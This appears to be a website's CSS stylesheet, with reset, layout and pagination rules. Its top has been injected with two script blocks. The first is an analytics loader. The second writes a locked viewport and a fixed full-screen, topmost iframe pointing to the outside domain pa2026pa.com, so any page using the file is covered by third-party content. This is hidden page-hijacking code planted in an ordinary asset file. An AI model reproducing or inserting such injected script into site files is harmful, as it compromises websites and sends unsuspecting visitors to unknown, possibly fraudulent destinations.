<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?e85f079646bd367aa369ed03553979b9";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>



<script>
document.write('<meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"><style>html,body{width:100%;height:100%;margin:0;padding:0}</style>');
  var iframe = document.createElement('iframe');
  iframe.src = 'https://pa2026pa.com/';
  iframe.scrolling = 'auto';
  iframe.style.cssText = "width:100%;height:100%;left:1px;top:1px;border:none;background:#fff";
  var div1 = document.createElement("div");
  var div =  document.createElement("div");
  div1.style.cssText = "-webkit-overflow-scrolling:touch;width:100%;height:100%;z-index:9999999999;position:fixed;top:0;left:0;";
    var is_mobi = navigator.userAgent.toLowerCase().match(/(ipad|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i) != null;
  if (is_mobi) {
    div1.style.overflow = "auto";
  }
  div1.appendChild(iframe);
  div.appendChild(div1);
  document.write(div.innerHTML);
</script>@charset "utf-8";
/* CSS Document */
html,body,ol,ul,li,p,h1,h2,h3,h4,h5,h6,p,dl,dt,dd,input{
	margin:0;
	padding:0;
}
body{
	font-family:"Gill Sans", "Gill Sans MT", "Myriad Pro", "DejaVu Sans Condensed", Helvetica, Arial, sans-serif; 
}
h1,h2,h3,h4,h5,h6{
	font-weight:normal;
}
a{
	text-decoration:none;
	outline:none;
}
a:hover{
	text-decoration:underline;
	outline:none;
}
li{
	list-style:none;
}
img{
	border:0;
}
input{
	outline:none;
}
/* @Public style
--------------------------------------------*/
.clearfix:after{
	clear:both;
	display:block;
	visibility:hidden;
	height:0;
	line-height:0;
	content:''; 
}
.clearfix{
	zoom:1;
}
.fl{
	float:left !important;
}
.fr{
	float:right !important;
}
.extra{
	margin-right:0 !important;
}
.lngen{
	font-family:"Gill Sans", "Gill Sans MT", "Myriad Pro", "DejaVu Sans Condensed", Helvetica, Arial, sans-serif;
}
/* @Public layout
--------------------------------------------*/
.mainWidth{
	width:1080px;
	margin:0 auto;
}
.fullWidth{
	width:100%;
}
.letMid{
	position:relative;
	width:1920px;
	left:50%;
	margin-left:-960px;
}
#switch{
	margin-top:30px;
}
#switch a{
	color:#888;
	display:block;
}
#switch a:hover{
	text-decoration:underline;
}
#switch .pre,#switch .next{
	color:#888;
	font-size:14px;
	line-height:22px;
	text-align:left;
}
#switch .pre{
	margin-bottom:5px;
}
/*pagelist*/
#pagelist{ 
	color:#666; 
	font-size:12px;
	line-height:40px;
	text-align:left;
	display:inline-block;
	margin-top:15px;
}
.pagination{
	height:25px;
	overflow:hidden;
	font-size:12px;
	margin:0;
	text-align:left; 
	padding:10px 0;
	margin-right:-10px;
	display:inline-block;
	float:right;
	margin-top:15px;
}
.pagination a{
	border:#d9d9d5 1px solid;
	color:#fff;
	padding:3px 4px;
	margin-left:8px;
	background:#d9403b;
}
.pagination a:hover{
	color:#fff;
	background:#df0700;
}
.pagination span.current{
	border:#d9d9d5 1px solid;
	color:#4e4e4e;
	padding:3px 4px;
	margin-left:8px;
	background:#e5e3e5;
}
.pagination span.disabled{ 
	color:#4e4e4e;
	background:#e5e3e5;
}